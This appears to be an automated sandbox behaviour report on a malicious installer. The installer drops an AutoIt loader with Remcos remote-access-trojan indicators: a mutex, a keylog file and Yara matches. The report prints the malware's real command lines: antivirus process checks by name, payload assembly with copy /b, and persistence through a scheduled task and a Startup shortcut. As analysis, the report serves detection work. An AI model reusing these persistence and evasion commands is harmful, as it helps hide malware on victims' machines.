    Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: wsock32.dllJump to behavior
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: wsock32.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: version.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: winmm.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: mpr.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: wininet.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: iphlpapi.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: userenv.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: uxtheme.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: kernel.appcore.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: windows.storage.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: wldp.dll
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: RailProvides_nopump.exeStatic file information: File size 1328655 > 1048576
    Source: RailProvides_nopump.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
    Source: RailProvides_nopump.exeStatic PE information: real checksum: 0x14327c should be: 0x14956c
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_00290315 push cs; retn 0028h21_2_00290318
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_00260DE6 push ecx; ret 21_2_00260DF9

    Persistence and Installation Behavior

    barindex
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comJump to dropped file
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comFile created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comJump to dropped file
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comJump to dropped file
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comFile created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comJump to dropped file

    Boot Survival

    barindex
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.urlJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.urlJump to behavior
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002D26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,21_2_002D26DD
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_0025FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,21_2_0025FC7C
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comWindow / User API: threadDelayed 4263Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comWindow / User API: threadDelayed 5263Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comWindow / User API: foregroundWindowGot 1769Jump to behavior
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comAPI coverage: 4.2 %
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com TID: 5436Thread sleep time: -108500s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com TID: 5576Thread sleep time: -12789000s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com TID: 5576Thread sleep time: -15789000s >= -30000sJump to behavior
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002BA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,21_2_002BA087
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002BA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,21_2_002BA1E2
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002AE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,21_2_002AE472
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002BA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,21_2_002BA570
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_0027C622 FindFirstFileExW,21_2_0027C622
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002B66DC FindFirstFileW,FindNextFileW,FindClose,21_2_002B66DC
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002B7333 FindFirstFileW,FindClose,21_2_002B7333
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002B73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,21_2_002B73D4
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002AD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,21_2_002AD921
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002ADC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,21_2_002ADC54
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_00245FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,21_2_00245FC8
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002BF4FF BlockInput,21_2_002BF4FF
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_0024338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,21_2_0024338B
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_00265058 mov eax, dword ptr fs:[00000030h]21_2_00265058
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002A20AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,21_2_002A20AA
    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_00272992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00272992
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_00260BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00260BAF
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_00260D45 SetUnhandledExceptionFilter,21_2_00260D45
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_00260F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_00260F91
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002A1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,21_2_002A1B4D
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_0024338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,21_2_0024338B
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002ABBED SendInput,keybd_event,21_2_002ABBED
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002AEC6C mouse_event,21_2_002AEC6C
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmdJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 361684Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E ApproachesJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Korea" Measurement Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 361684\Propose.com + Different + Constitute + Instantly + Led + Indonesia + Dressing + Missed + Brian + Clinton + Protocol 361684\Propose.comJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Next + ..\Math + ..\Blocked + ..\Leisure + ..\Substantial + ..\Beam + ..\Cocks + ..\David + ..\Undefined + ..\Realm UJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com Propose.com UJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /FJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\linkhub.url" & echo url="c:\users\user\appdata\local\connectware technologies ltd\linkhub.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\linkhub.url" & exit
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\linkhub.url" & echo url="c:\users\user\appdata\local\connectware technologies ltd\linkhub.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\linkhub.url" & exitJump to behavior
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002A14AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,21_2_002A14AE
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002A1FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,21_2_002A1FB0
    Source: Propose.com, 0000000D.00000003.2081021797.00000000041CE000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000000D.00000000.2074294662.0000000000F03000.00000002.00000001.01000000.00000006.sdmp, LinkHub.com, 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
    Source: LinkHub.comBinary or memory string: Shell_TrayWnd
    Source: logs.dat.13.drBinary or memory string: [Program Manager]
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_00260A08 cpuid 21_2_00260A08
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_0029E5F4 GetLocalTime,21_2_0029E5F4
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_0029E652 GetUserNameW,21_2_0029E652
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_0027BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,21_2_0027BCD2
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeCode function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
    Source: LinkHub.comBinary or memory string: WIN_81
    Source: LinkHub.comBinary or memory string: WIN_XP
    Source: Brian.9.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
    Source: LinkHub.comBinary or memory string: WIN_XPe
    Source: LinkHub.comBinary or memory string: WIN_VISTA
    Source: LinkHub.comBinary or memory string: WIN_7
    Source: LinkHub.comBinary or memory string: WIN_8

    Remote Access Functionality

    barindex
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comMutex created: \Sessions\1\BaseNamedObjects\Rmc-3QMI88Jump to behavior
    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
